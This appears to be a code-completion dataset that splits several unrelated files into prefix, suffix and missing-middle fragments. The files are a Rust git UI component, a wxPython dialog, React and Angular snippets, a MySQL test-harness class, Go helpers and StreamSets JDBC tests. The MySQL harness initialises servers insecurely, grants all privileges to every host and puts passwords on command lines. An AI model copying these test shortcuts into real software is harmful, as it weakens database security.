self.hide_stacked(false);
} else if e == self.key_config.keys.focus_right
&& self.can_focus_diff()
{
self.details.focus(false);
self.diff.focus(true);
} else if e == self.key_config.keys.focus_left
&& self.diff.focused()
{
self.details.focus(true);
self.diff.focus(false);
} else if e == self.key_config.keys.focus_left {
self.hide_stacked(false);
}
return Ok(EventState::Consumed);
}
}
Ok(EventState::NotConsumed)
}
fn is_visible(&self) -> bool {
self.visible
}
fn hide(&mut self) {
self.visible = false;
}
fn show(&mut self) -> Result<()> {
self.visible = true;
self.details.show()?;
self.details.focus(true);
self.diff.focus(false);
self.update()?;
Ok(())
}
}
impl CompareCommitsComponent {
accessors!(self, [diff, details]);
///
pub fn new(
repo: &RepoPathRef,
queue: &Queue,
sender: &Sender<AsyncGitNotification>,
theme: SharedTheme,
key_config: SharedKeyConfig,
) -> Self {
Self {
repo: repo.clone(),
details: CommitDetailsComponent::new(
repo,
queue,
sender,
theme.clone(),
key_config.clone(),
),
diff: DiffComponent::new(
repo.clone(),
queue.clone(),
theme,
key_config.clone(),
true,
),
open_request: None,
git_diff: AsyncDiff::new(repo.borrow().clone(), sender),
visible: false,
key_config,
queue: queue.clone(),
}
}
///
pub fn open(&mut self, open: InspectCommitOpen) -> Result<()> {
let compare_id = if let Some(compare_id) = open.compare_id {
compare_id
} else {
sync::get_head_tuple(&self.repo.borrow())?.id
};
self.open_request = Some(InspectCommitOpen {
commit_id: open.commit_id,
compare_id: Some(compare_id),
tags: open.tags,
});
self.show()?;
Ok(())
}
///
pub fn any_work_pending(&self) -> bool {
self.git_diff.is_pending() || self.details.any_work_pending()
}
///
pub fn update_git(
&mut self,
ev: AsyncGitNotification,
) -> Result<()> {
if self.is_visible() {
if ev == AsyncGitNotification::CommitFiles {
self.update()?;
} else if ev == AsyncGitNotification::Diff {
self.update_diff()?;
}
}
Ok(())
}
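/// Returns the pair (commit id, compare id) from the current open request, if both are set.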
fn get_ids(&self) -> Option<(CommitId, CommitId)> {
let other = self
.open_request
.as_ref()
.and_then(|open| open.compare_id);
self.open_request
.as_ref()
.map(|open| open.commit_id)
.zip(other)
}
/// called when any tree component changed selection
pub fn update_diff(&mut self) -> Result<()> {
if self.is_visible() {
if let Some(ids) = self.get_ids() {
if let Some(f) = self.details.files().selection_file()
{
let diff_params = DiffParams {
path: f.path.clone(),
diff_type: DiffType::Commits(ids),
options: DiffOptions::default(),
};
if let Some((params, last)) =
self.git_diff.last()?
{
if params == diff_params {
self.diff.update(f.path, false, last);
return Ok(());
}
}
self.git_diff.request(diff_params)?;
self.diff.clear(true);
return Ok(());
}
}
self.diff.clear(false);
}
Ok(())
}
fn update(&mut self) -> Result<()> {
self.details.set_commits(
self.get_ids().map(CommitFilesParams::from),
None,
)?;
self.update_diff()?;
Ok(())
}
fn can_focus_diff(&self) -> bool {
self.details.files().selection_file().is_some()
}
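/// Hides the popup; when `stack` is true the current open request is pushed onto the popup stack for later restoration, otherwise the stack is popped.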
fn hide_stacked(&mut self, stack: bool) {
self.hide();
if stack {
if let Some(request) = self.open_request.clone() {
self.queue.push(InternalEvent::PopupStackPush(
StackablePopupOpen::CompareCommits(request),
));
}
} else {
self.queue.push(InternalEvent::PopupStackPop);
}
}
}
| {
if self.is_visible() || force_all {
command_pump(
out,
force_all,
self.components().as_slice(),
);
out.push(
CommandInfo::new(
strings::commands::close_popup(&self.key_config),
true,
true,
)
.order(1),
);
out.push(CommandInfo::new(
strings::commands::diff_focus_right(&self.key_config),
self.can_focus_diff(),
!self.diff.focused() || force_all,
));
out.push(CommandInfo::new(
strings::commands::diff_focus_left(&self.key_config),
true,
self.diff.focused() || force_all,
));
}
visibility_blocking(self)
} |
welcome_dialog.py | import webbrowser
import wx
from eplaunch import DOCS_URL, VERSION
# wx callbacks need an event argument even though we usually don't use it, so the next line disables that check
# noinspection PyUnusedLocal
class | (wx.Dialog):
CLOSE_SIGNAL_OK = 0
def __init__(self, *args, **kwargs):
super(WelcomeDialog, self).__init__(*args, **kwargs)
self.SetTitle("EP-Launch")
this_border = 12
self.panel = wx.Panel(self, wx.ID_ANY)
title = wx.StaticText(self.panel, wx.ID_ANY, 'Welcome to EP-Launch ' + VERSION)
message = """
EP-Launch has been around for many years as a part of the EnergyPlus distribution.
Starting with the 3.0 release, it has changed drastically, completely redesigned and rewritten.
For full documentation or a quick start guide, click the "Open Docs" button below.
This dialog will only be shown once, but documentation is available in the Help menu.
"""
text_description = wx.StaticText(self.panel, wx.ID_ANY, message, style=wx.ALIGN_CENTRE_HORIZONTAL)
ok_button = wx.Button(self.panel, label='OK')
docs_button = wx.Button(self.panel, label='Open Docs')
self.Bind(wx.EVT_CLOSE, self.handle_close_ok)
ok_button.Bind(wx.EVT_BUTTON, self.handle_close_ok)
docs_button.Bind(wx.EVT_BUTTON, self.handle_open_docs)
button_row_sizer = wx.BoxSizer(wx.HORIZONTAL)
button_row_sizer.Add(ok_button, flag=wx.LEFT | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL, border=this_border)
button_row_sizer.Add(docs_button, flag=wx.LEFT | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL, border=this_border)
sizer_main_vertical = wx.BoxSizer(wx.VERTICAL)
sizer_main_vertical.Add(title, 0, wx.CENTER | wx.ALL, border=this_border)
sizer_main_vertical.Add(text_description, proportion=1, flag=wx.ALL | wx.EXPAND, border=this_border)
sizer_main_vertical.Add(button_row_sizer, flag=wx.ALL | wx.ALIGN_CENTER, border=this_border)
self.panel.SetSizer(sizer_main_vertical)
sizer_main_vertical.Fit(self)
def handle_open_docs(self, e):
webbrowser.open(DOCS_URL)
def handle_close_ok(self, e):
self.EndModal(WelcomeDialog.CLOSE_SIGNAL_OK)
| WelcomeDialog |
ShootingPhaseDetails.tsx | import React from 'react'
import { StatBadge } from '../StatBadge'
import AbilityList from './AbilityList'
import WeaponList from './WeaponList'
import { Row, Col } from 'react-bootstrap'
import { ModelTitle } from '../ModelTitle'
import { Model } from '../../types/KillTeam2018'
interface Props {
model: Model
}
export function ShootingPhaseDetails (props: Props) {
return (
<Row>
<Col sm='10'>
<ModelTitle {...props.model} />
{hasRangedWeapons(props.model) && <WeaponList weapons={props.model.weapons} phase='shooting' userStrength={props.model.stats.strength} />}
<AbilityList abilities={props.model.abilities} phase='shooting' />
</Col>
<Col sm='1' className='px-1'>
{hasRangedWeapons(props.model) && <StatBadge name='BS' value={`${props.model.stats.ballistic_skill}`} secondaryValue='+' />}
<StatBadge name='T' value={`${props.model.stats.toughness}`} />
</Col>
<Col sm='1' className='px-1'>
<StatBadge name='Sv' value={`${props.model.stats.save}`} secondaryValue='+' />
{props.model.stats.invulnerable_save | </Col>
</Row>
)
}
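// A model counts as having ranged weapons when its ballistic skill is defined and at least one of its weapons is not a melee weapon.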
export function hasRangedWeapons (model: Model) {
return !isNaN(model.stats.ballistic_skill) && (model.weapons.filter((x) => (x.type !== 'Melee')).length > 0)
} | ? <StatBadge name='Inv' value={`${props.model.stats.invulnerable_save}`} secondaryValue='+' />
: <></>} |
app-routing.module.ts | import { NgModule } from '@angular/core';
import { Routes, RouterModule } from '@angular/router';
import { NavbarComponent } from './shared/navbar/navbar.component';
import { FirstComponent } from './shared/first/first.component';
const routes: Routes = [
{path:'',redirectTo:'first',pathMatch:'full'},
{path:'first',component:FirstComponent}
];
@NgModule({
imports: [RouterModule.forRoot(routes)],
exports: [RouterModule]
})
export class | { }
| AppRoutingModule |
mysql.py | #!/usr/bin/env python3
from tiden.apps.app import App
from tiden.apps.nodestatus import NodeStatus
from tiden.util import *
class Mysql(App):
tmp_pwd_log_tag = "A temporary password is generated for root@localhost:"
account_tmpl = [
"CREATE USER '__USER__'@'__HOST__' IDENTIFIED BY '__PWD__';",
"GRANT ALL PRIVILEGES ON *.* TO '__USER__'@'__HOST__' WITH GRANT OPTION;"
]
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.app_type = 'mysql'
self.init_file = None
self.username = None
self.password = None
self.mysql_home = None
if self.config.get('rt'):
self.mysql_home = "%s/%s" % (self.config['rt']['remote']['test_module_dir'], self.name)
mod_dir = self.config['rt']['remote']['test_module_dir']
self.killall_mysqld_mark = self.config['dir_prefix']
server_id = 1
port_start = 30000
servers_per_host = 1
if self.config['environment']['mysql'].get('servers_per_host') is not None:
servers_per_host = int(self.config['environment']['mysql']['servers_per_host'])
for host in self.config['environment']['mysql']['server_hosts']:
for x in range(0, servers_per_host):
self.nodes[server_id] = {
'host': host,
'server_id': server_id,
'data_dir': "%s/data.%s" % (self.mysql_home, server_id),
'log_dir': "%s/mysql.server.%s.logs" % (mod_dir, server_id)
}
server_id += 1
def setup(self):
prepare_dirs = {}
self.mysql_home = "%s/%s" % (self.config['rt']['remote']['test_module_dir'], self.name)
for server_id in self.nodes.keys():
host = self.nodes[server_id]['host']
if not prepare_dirs.get(host):
prepare_dirs[host] = []
self.nodes[server_id]['status'] = NodeStatus.NEW
prepare_dirs[host].extend(
[
"ln -s %s %s" % (
self.config['artifacts'][self.name]['remote_path'],
self.mysql_home
),
'mkdir %s' % self.nodes[server_id]['data_dir'],
'mkdir %s' % self.nodes[server_id]['log_dir']
]
)
server_id += 1
self.ssh.exec(prepare_dirs)
def init_db(self):
init = {}
for server_id in self.nodes.keys():
host = self.nodes[server_id]['host']
if not init.get(host):
init[host] = []
init[host].extend(
[
'cd %s; bin/mysqld --defaults-file=%s --initialize-insecure' % (
self.mysql_home,
self.nodes[server_id]['config']
)
]
)
server_id += 1
self.ssh.exec(init)
def check_requirements(self):
self.require_artifact('mysql')
self.require_environment('mysql')
def teardown(self):
self.killall()
def start(self):
start_cmd = {}
pid_cmd = {}
log_print('Start MySQL server(s)')
server_options = ''
if self.init_file:
server_options += " --init-file=%s" % self.init_file
for server_id in self.nodes.keys():
host = self.nodes[server_id]['host']
if not start_cmd.get(host):
start_cmd[host] = []
pid_cmd[host] = []
self.nodes[server_id]['status'] = NodeStatus.STARTING
start_cmd[host].extend(
[
"cd %s; nohup bin/mysqld --defaults-file=%s -D%s;" % (
self.mysql_home,
self.nodes[server_id]['config'],
server_options
),
]
)
pid_cmd[host].extend(
[
"cat %s/mysqld.pid | awk '{print %s, $1}'" % (
self.nodes[server_id]['data_dir'],
server_id
)
]
)
self.ssh.exec(start_cmd)
res = self.ssh.exec(pid_cmd)
for host in res.keys():
lines = res[host]
for line in lines:
for server_id in self.nodes.keys():
m = search('^' + str(server_id) + ' ([0-9]+)$', line.rstrip())
if m:
self.nodes[server_id]['pid'] = m.group(1)
self.nodes[server_id]['status'] = NodeStatus.STARTED
log_print('MySQL server %s started on %s, pid %s' % (server_id, host, m.group(1)))
def stop(self):
log_print('Stop MySQL server(s)')
cmd = {}
wait_cmd = {}
killing_server_num = 0
for server_id in self.nodes.keys():
if self.nodes[server_id]['status'] == NodeStatus.STARTED:
host = self.nodes[server_id]['host']
if not cmd.get(host):
cmd[host] = []
wait_cmd[host] = []
cmd[host].extend(
[
"nohup kill %s & 2>&1 >> %s/mysql.kill.log" % (
self.nodes[server_id]['pid'], self.config['rt']['remote']['test_dir']
)
]
)
wait_cmd[host].extend(
[
"ps -p %s | grep -c mysql" % (
self.nodes[server_id]['pid']
)
]
)
self.nodes[server_id]['status'] = NodeStatus.KILLING
killing_server_num += 1
self.ssh.exec(cmd)
started = int(time())
timeout_counter = 0
while timeout_counter < 60:
res = self.ssh.exec(wait_cmd)
cur_killed_server_num = 0
for host in res.keys():
for line in res[host]:
if line.rstrip() == '0':
cur_killed_server_num += 1
log_put("Wait for stopped MySQL servers %s/%s in %s/%s sec:" %
(
cur_killed_server_num,
killing_server_num,
timeout_counter,
60
)
)
if cur_killed_server_num == killing_server_num:
log_put("MySQL servers stopped in %s sec:" % timeout_counter)
break
sleep(2)
timeout_counter = int(time() - started)
log_print()
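# Build CREATE USER/GRANT statements for all MySQL hosts, upload them as set_accounts.sql, and register the file so start() passes it via --init-file.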
def set_account(self, username, pwd):
accounts_stmts = []
for host in (self.config['environment']['mysql']['server_hosts'] + ['127.0.0.1', 'localhost']):
for line in self.account_tmpl:
accounts_stmts.append(
"%s\n" % line.replace('__HOST__', host).replace('__USER__', username).replace('__PWD__', pwd)
)
accounts_file = "%s/set_accounts.sql" % self.config['rt']['test_resource_dir']
with open(accounts_file, 'w') as w:
w.writelines(accounts_stmts)
self.ssh.upload_for_hosts(
self.config['environment']['mysql']['server_hosts'],
[accounts_file],
self.config['rt']['remote']['test_dir']
)
self.init_file = "%s/set_accounts.sql" % self.config['rt']['remote']['test_dir']
self.username = username
self.password = pwd
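# Configure replication on the slave: generate a CHANGE MASTER TO statement pointing at the master node and execute it via the mysql client.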
def change_master(self, master_id, slave_id):
cmds = {
self.nodes[slave_id]['host']: [
"echo \"CHANGE MASTER TO "
"MASTER_HOST='%s', "
"MASTER_USER='%s', "
"MASTER_PASSWORD='%s', "
"MASTER_PORT=%s;\" > "
"%s/change_master.sql" % (
self.nodes[master_id]['host'],
self.username,
self.password,
self.nodes[master_id]['port'],
self.config['rt']['remote']['test_dir'],
),
"cd %s;bin/mysql -u%s -p%s -h127.0.0.1 -P%s "
" < %s/change_master.sql" % (
self.mysql_home,
self.username,
self.password,
self.nodes[slave_id]['port'],
self.config['rt']['remote']['test_dir']
)
]
}
res = self.ssh.exec(cmds)
def reset_master(self, master_id):
cmd = {
self.nodes[master_id]['host']: [
"cd %s;bin/mysql -u%s -p%s -h127.0.0.1 -P%s "
"--execute='%s'" % (
self.mysql_home,
self.username,
self.password,
self.nodes[master_id]['port'],
'RESET MASTER;'
)
]
}
res = self.ssh.exec(cmd)
def start_slave(self, slave_id):
cmds = {
self.nodes[slave_id]['host']: [
"cd %s;bin/mysql -u%s -p%s -h127.0.0.1 -P%s "
"--execute='START SLAVE;'" % (
self.mysql_home,
self.username,
self.password,
self.nodes[slave_id]['port'],
)
]
}
res = self.ssh.exec(cmds)
def get_node(self, id):
return self.nodes[id]
def | (self):
nodes = {}
for server_id in self.nodes.keys():
host = self.nodes[server_id]['host']
if not nodes.get(host):
nodes[host] = server_id
return list(nodes.values())
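# Run a single SQL statement on the node using the mysql client's vertical output (-E) and parse the result set into a list of row dicts.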
def exec_statement(self, node_id, stmt):
rs = []
host = self.nodes[node_id]['host']
cmd = {
host: [
"cd %s;bin/mysql -u%s -p%s -h127.0.0.1 -P%s -E "
"--execute='%s;'" % (
self.mysql_home,
self.username,
self.password,
self.nodes[node_id]['port'],
stmt
)
]
}
res = self.ssh.exec(cmd)
row_idx = 1
cur = None
for line in res[host][0].split('\n'):
if line.startswith('*') and str("* %s. row *" % row_idx) in line:
if cur is not None:
rs.append(cur)
row_idx += 1
cur = {}
elif ':' in line and row_idx > 1:
sep_idx = line.find(':')
if sep_idx > 0:
cur[line[0:sep_idx].strip()] = line[sep_idx + 1:].strip()
if cur is not None:
rs.append(cur)
return rs
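# Kill -9 every mysqld process whose command line carries this run's dir_prefix marker, then wait up to 60 seconds for them all to exit.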
def killall(self):
get_pid_cmd = ["ps ax | grep '%s'" % self.killall_mysqld_mark]
raw_pid_data = self.ssh.exec(get_pid_cmd)
kill_cmd = {}
for host in raw_pid_data.keys():
for line in raw_pid_data[host][0].split('\n'):
m = search('^([0-9]+)\s+', line.strip())
if m and 'mysqld' in line:
pid = m.group(1)  # group(1) captures just the numeric pid, without trailing whitespace
if kill_cmd.get(host) is None:
kill_cmd[host] = []
kill_cmd[host].append('kill -9 %s; sleep 1;' % pid)
if len(kill_cmd) > 0:
self.ssh.exec(kill_cmd)
started = int(time())
timeout_counter = 0
while timeout_counter < 60:
raw_pid_data = self.ssh.exec(get_pid_cmd)
cur_running_server_num = 0
for host in raw_pid_data.keys():
for line in raw_pid_data[host][0].split('\n'):
if 'mysqld' in line and self.killall_mysqld_mark in line:
cur_running_server_num += 1
log_put(
"Wait for killed MySQL servers, still running %s, %s/%s sec:" % (
cur_running_server_num,
timeout_counter,
60
))
if cur_running_server_num == 0:
log_put("MySQL servers killed in %s sec:" % timeout_counter)
break
sleep(2)
timeout_counter = int(time() - started)
log_print()
| get_non_collocated_nodes |
utils.go | package utils
import "fmt"
func Min(first int, rest ...int) int {
if len(rest) == 0 |
m := first
for _, n := range rest {
if n < m {
m = n
}
}
return m
}
func Max(first int, rest ...int) int {
if len(rest) == 0 {
return first
}
m := first
for _, n := range rest {
if n > m {
m = n
}
}
return m
}
func AnsiRed(s string) string {
return fmt.Sprintf("\u001b[31m%s\u001b[0m", s)
}
func AnsiGreen(s string) string {
return fmt.Sprintf("\u001b[32m%s\u001b[0m", s)
}
func AnsiUnderline(s string) string {
return fmt.Sprintf("\u001b[4m%s\u001b[0m", s)
}
func AnsiBGRed(s string) string {
return fmt.Sprintf("\u001b[41m%s\u001b[0m", s)
}
| {
return first
} |
test_jdbc_stages.py | # Copyright 2017 StreamSets Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import json
import logging
import math
import os
import random
import string
import tempfile
import time
from collections import OrderedDict
import pytest
import sqlalchemy
import datetime
from streamsets.sdk.utils import Version
from streamsets.testframework.environments.databases import Db2Database, OracleDatabase, SQLServerDatabase, PostgreSqlDatabase
from streamsets.testframework.markers import credentialstore, database, sdc_min_version
from streamsets.testframework.utils import get_random_string
logger = logging.getLogger(__name__)
ROWS_IN_DATABASE = [
{'id': 1, 'name': 'Dima'},
{'id': 2, 'name': 'Jarcec'},
{'id': 3, 'name': 'Arvind'}
]
ROWS_TO_UPDATE = [
{'id': 2, 'name': 'Eddie'},
{'id': 4, 'name': 'Jarcec'}
]
LOOKUP_RAW_DATA = ['id'] + [str(row['id']) for row in ROWS_IN_DATABASE]
RAW_DATA = ['name'] + [row['name'] for row in ROWS_IN_DATABASE]
DEFAULT_DB2_SCHEMA = 'DB2INST1'
@database
def test_jdbc_multitable_consumer_origin_simple(sdc_builder, sdc_executor, database):
"""
Check if Jdbc Multi-table Origin can retrieve any records from a table.
Destination is Trash.
Verify input and output (via snapshot).
"""
src_table_prefix = get_random_string(string.ascii_lowercase, 6)
table_name = '{}_{}'.format(src_table_prefix, get_random_string(string.ascii_lowercase, 20))
pipeline_builder = sdc_builder.get_pipeline_builder()
jdbc_multitable_consumer = pipeline_builder.add_stage('JDBC Multitable Consumer')
jdbc_multitable_consumer.set_attributes(table_configs=[{"tablePattern": f'%{src_table_prefix}%'}])
trash = pipeline_builder.add_stage('Trash')
jdbc_multitable_consumer >> trash
pipeline = pipeline_builder.build().configure_for_environment(database)
metadata = sqlalchemy.MetaData()
table = sqlalchemy.Table(
table_name,
metadata,
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column('name', sqlalchemy.String(32))
)
try:
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
logger.info('Adding three rows into %s database ...', database.type)
connection = database.engine.connect()
connection.execute(table.insert(), ROWS_IN_DATABASE)
sdc_executor.add_pipeline(pipeline)
snapshot = sdc_executor.capture_snapshot(pipeline=pipeline, start_pipeline=True).snapshot
sdc_executor.stop_pipeline(pipeline)
# Column names are converted to lower case since Oracle database column names are in upper case.
tuples_to_lower_name = lambda tup: (tup[0].lower(), tup[1])
rows_from_snapshot = [tuples_to_lower_name(list(record.field.items())[1])
for record in snapshot[pipeline[0].instance_name].output]
assert rows_from_snapshot == [('name', row['name']) for row in ROWS_IN_DATABASE]
finally:
logger.info('Dropping table %s in %s database...', table_name, database.type)
table.drop(database.engine)
@database
def test_jdbc_consumer_offset_resume(sdc_builder, sdc_executor, database):
|
@database
def test_jdbc_consumer_non_incremental_mode(sdc_builder, sdc_executor, database):
"""Ensure that the Query consumer works properly in non-incremental mode."""
if database.type == 'Oracle':
pytest.skip("This test depends on proper case for column names that Oracle auto-uppers.")
metadata = sqlalchemy.MetaData()
table_name = get_random_string(string.ascii_lowercase, 20)
table = sqlalchemy.Table(
table_name,
metadata,
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column('name', sqlalchemy.String(32))
)
pipeline_builder = sdc_builder.get_pipeline_builder()
origin = pipeline_builder.add_stage('JDBC Query Consumer')
origin.incremental_mode = False
origin.sql_query = 'SELECT * FROM {0}'.format(table_name)
trash = pipeline_builder.add_stage('Trash')
origin >> trash
finisher = pipeline_builder.add_stage("Pipeline Finisher Executor")
origin >= finisher
pipeline = pipeline_builder.build().configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
try:
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
connection = database.engine.connect()
connection.execute(table.insert(), ROWS_IN_DATABASE)
# Run the pipeline N times, it should always read the same
for i in range(3):
snapshot = sdc_executor.capture_snapshot(pipeline=pipeline, start_pipeline=True).snapshot
assert len(snapshot[origin].output) == len(ROWS_IN_DATABASE)
assert snapshot[origin].output[0].get_field_data('/id') == 1
assert snapshot[origin].output[1].get_field_data('/id') == 2
assert snapshot[origin].output[2].get_field_data('/id') == 3
# TLKT-249: Add wait_for_finished to get_status object
sdc_executor.get_pipeline_status(pipeline).wait_for_status('FINISHED')
finally:
logger.info('Jdbc No More Data: Dropping table %s in %s database...', table_name, database.type)
table.drop(database.engine)
@database
def test_jdbc_multitable_consumer_with_finisher(sdc_builder, sdc_executor, database):
"""
Test reading with Multi-table JDBC, output to trash.
Test some table names that start with numbers (SDC-5381).
    Check that the Pipeline Finisher Executor works correctly.
"""
src_table_prefix = get_random_string(string.ascii_lowercase, 6)
pipeline_builder = sdc_builder.get_pipeline_builder()
jdbc_multitable_consumer = pipeline_builder.add_stage('JDBC Multitable Consumer')
jdbc_multitable_consumer.set_attributes(table_configs=[{"tablePattern": f'%{src_table_prefix}%'}])
finisher = pipeline_builder.add_stage('Pipeline Finisher Executor')
trash = pipeline_builder.add_stage('Trash')
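    # Events (such as no-more-data) go to the finisher via '>='; data records go to Trash via '>>'.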
jdbc_multitable_consumer >= finisher
jdbc_multitable_consumer >> trash
pipeline = pipeline_builder.build().configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
random.seed()
tables = []
metadata = sqlalchemy.MetaData()
try:
connection = database.engine.connect()
num_letters = 10
num_recs = 10
num_tables = 3
for i in range(0, num_tables):
if i % 2 == 1:
                # table name starts with a number and contains lowercase letters.
input_name = '{}_{}_{}'.format(str(i), src_table_prefix,
get_random_string(string.ascii_lowercase, num_letters))
else:
                # table name consists of lowercase letters only.
input_name = '{}_{}'.format(src_table_prefix, get_random_string(string.ascii_lowercase, num_letters))
tables.append(sqlalchemy.Table(
input_name,
metadata,
sqlalchemy.Column('serial', sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column('data', sqlalchemy.Integer)
))
tables[i].create(database.engine)
rows = [{'serial': j, 'data': random.randint(0, 2100000000)} for j in range(1, num_recs + 1)]
connection.execute(tables[i].insert(), rows)
sdc_executor.start_pipeline(pipeline).wait_for_finished()
finally:
for table in tables:
table.drop(database.engine)
# SDC-11009: Run away pipeline runners in JDBC Multithread origins when no-more-data generation delay is configured
@database
@sdc_min_version('3.2.0')
def test_jdbc_multitable_consumer_with_no_more_data_event_generation_delay(sdc_builder, sdc_executor, database):
"""
Make sure that when a delayed no-more-data is being processed, the pipeline properly waits on the processing to
finish before stopping.
source >> trash
>= delay (only for no-more-data) >> trash
"""
src_table = get_random_string(string.ascii_lowercase, 6)
pipeline_builder = sdc_builder.get_pipeline_builder()
jdbc_multitable_consumer = pipeline_builder.add_stage('JDBC Multitable Consumer')
jdbc_multitable_consumer.no_more_data_event_generation_delay_in_seconds = 1
jdbc_multitable_consumer.table_configs = [{"tablePattern": f'%{src_table}%'}]
trash = pipeline_builder.add_stage('Trash')
delay = pipeline_builder.add_stage('Delay')
delay.delay_between_batches = 10 * 1000
delay.stage_record_preconditions = ['${record:eventType() == "no-more-data"}']
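    # Only the no-more-data event passes the precondition, so the 10 second delay applies to that single event record.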
trash_event = pipeline_builder.add_stage('Trash')
jdbc_multitable_consumer >> trash
jdbc_multitable_consumer >= delay
delay >> trash_event
pipeline = pipeline_builder.build().configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
metadata = sqlalchemy.MetaData()
try:
connection = database.engine.connect()
table = sqlalchemy.Table(
src_table,
metadata,
sqlalchemy.Column('serial', sqlalchemy.Integer, primary_key=True)
)
table.create(database.engine)
rows = [{'serial': 1}]
connection.execute(table.insert(), rows)
# We start the pipeline
sdc_executor.start_pipeline(pipeline)
# We wait three seconds - one second for the no-more-data to be generated and then some buffer time
time.sleep(3)
        # Then we try to stop the pipeline; it should not stop immediately and should in fact wait for the delayed batch
sdc_executor.stop_pipeline(pipeline).wait_for_stopped()
current_status = sdc_executor.get_pipeline_status(pipeline).response.json().get('status')
assert current_status == 'STOPPED'
# Validate expected metrics
history = sdc_executor.get_pipeline_history(pipeline)
# Total number of input records
assert history.latest.metrics.counter('pipeline.batchInputRecords.counter').count == 1
        # 1 record, 1 no-more-data (the rest of the events are discarded)
assert history.latest.metrics.counter('pipeline.batchOutputRecords.counter').count == 2
# The table itself contained only one record
assert history.latest.metrics.counter('stage.Trash_01.inputRecords.counter').count == 1
# Only no-more-data event should reach the destination
assert history.latest.metrics.counter('stage.Trash_02.inputRecords.counter').count == 1
        # The max batch time should be slightly more than 10 seconds (the delayed batch that we caused)
# TODO: TLKT-167: Add access methods to metric objects
assert history.latest.metrics.timer('pipeline.batchProcessing.timer')._data.get('max') >= 10
finally:
if table is not None:
table.drop(database.engine)
def _get_random_name(database, prefix='', length=5):
"""Generate a random string to use as a database object name.
It handles letter case according to the database type, forcing upper-case (e.g. Oracle) or lower-case
(e.g. Postgres).
Args:
database: a :obj:`streamsets.testframework.environment.Database` object.
prefix: (:obj:`str`) add a prefix to the generated name. Default: ''.
length: (:obj:`int`) number of characters of the generated name (without counting ``prefix``).
"""
if isinstance(database, OracleDatabase):
        name = '{}{}'.format(prefix.upper(), get_random_string(string.ascii_uppercase, length))
else:
        name = '{}{}'.format(prefix.lower(), get_random_string(string.ascii_lowercase, length))
return name
def _create_table(table_name, database, schema_name=None):
"""Helper function to create a table with two columns: id (int, PK) and name (str).
Args:
table_name: (:obj:`str`) the name for the new table.
database: a :obj:`streamsets.testframework.environment.Database` object.
schema_name: (:obj:`str`, optional) when provided, create the new table in a specific schema; otherwise,
the default schema for the engine’s database connection is used.
Return:
The new table as a sqlalchemy.Table object.
"""
metadata = sqlalchemy.MetaData()
if type(database) == SQLServerDatabase:
table = sqlalchemy.Table(table_name,
metadata,
sqlalchemy.Column('name', sqlalchemy.String(32)),
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True,
autoincrement=False),
schema=schema_name)
else:
table = sqlalchemy.Table(table_name,
metadata,
sqlalchemy.Column('name', sqlalchemy.String(32)),
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True),
schema=schema_name)
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
return table
def _create_schema(schema_name, database):
"""Create a new schema in the database.
    For RDBMSs with no distinction between schema and database (e.g. MySQL), it creates a new database. For Oracle, it
    creates a new user. For databases with schema objects, it creates a new schema.
    Use ``_drop_schema()`` to remove schemas created by this function, so that each case is handled properly.
Args:
schema_name: (:obj:`str`) the schema name.
database: a :obj:`streamsets.testframework.environment.Database` object.
"""
if isinstance(database, OracleDatabase):
database.engine.execute('CREATE USER {user} IDENTIFIED BY {pwd}'.format(user=schema_name, pwd=schema_name))
database.engine.execute('GRANT CONNECT, RESOURCE TO {user}'.format(user=schema_name))
else:
schema = sqlalchemy.schema.CreateSchema(schema_name)
database.engine.execute(schema)
def _drop_schema(schema_name, database):
"""Remove a schema from the given database.
Args:
schema_name: (:obj:`str`) name of the schema to remove.
database: a :obj:`streamsets.testframework.environment.Database` object.
"""
if isinstance(database, OracleDatabase):
database.engine.execute('DROP USER {user} CASCADE'.format(user=schema_name))
else:
        database.engine.execute(sqlalchemy.schema.DropSchema(schema_name))
@credentialstore
@database
def test_jdbc_lookup_processor(sdc_builder, sdc_executor, database):
"""Simple JDBC Lookup processor test.
Pipeline will enrich records with the 'name' by adding a field as 'FirstName'.
The pipeline looks like:
dev_raw_data_source >> jdbc_lookup >> trash
"""
table_name = get_random_string(string.ascii_lowercase, 20)
table = _create_table(table_name, database)
logger.info('Adding %s rows into %s database ...', len(ROWS_IN_DATABASE), database.type)
connection = database.engine.connect()
connection.execute(table.insert(), ROWS_IN_DATABASE)
pipeline_builder = sdc_builder.get_pipeline_builder()
dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')
dev_raw_data_source.set_attributes(data_format='DELIMITED',
header_line='WITH_HEADER',
raw_data='\n'.join(LOOKUP_RAW_DATA))
jdbc_lookup = pipeline_builder.add_stage('JDBC Lookup')
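    # The lookup query is evaluated per record: '/id' is resolved via EL and the matching 'name' is mapped to '/FirstName'.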
query_str = f"SELECT name FROM {table_name} WHERE id = '${{record:value('/id')}}'"
column_mappings = [dict(dataType='USE_COLUMN_TYPE',
columnName='name',
field='/FirstName')]
jdbc_lookup.set_attributes(sql_query=query_str,
column_mappings=column_mappings)
trash = pipeline_builder.add_stage('Trash')
dev_raw_data_source >> jdbc_lookup >> trash
pipeline = pipeline_builder.build(title='JDBC Lookup').configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
LOOKUP_EXPECTED_DATA = copy.deepcopy(ROWS_IN_DATABASE)
for record in LOOKUP_EXPECTED_DATA:
record.pop('id')
record['FirstName'] = record.pop('name')
try:
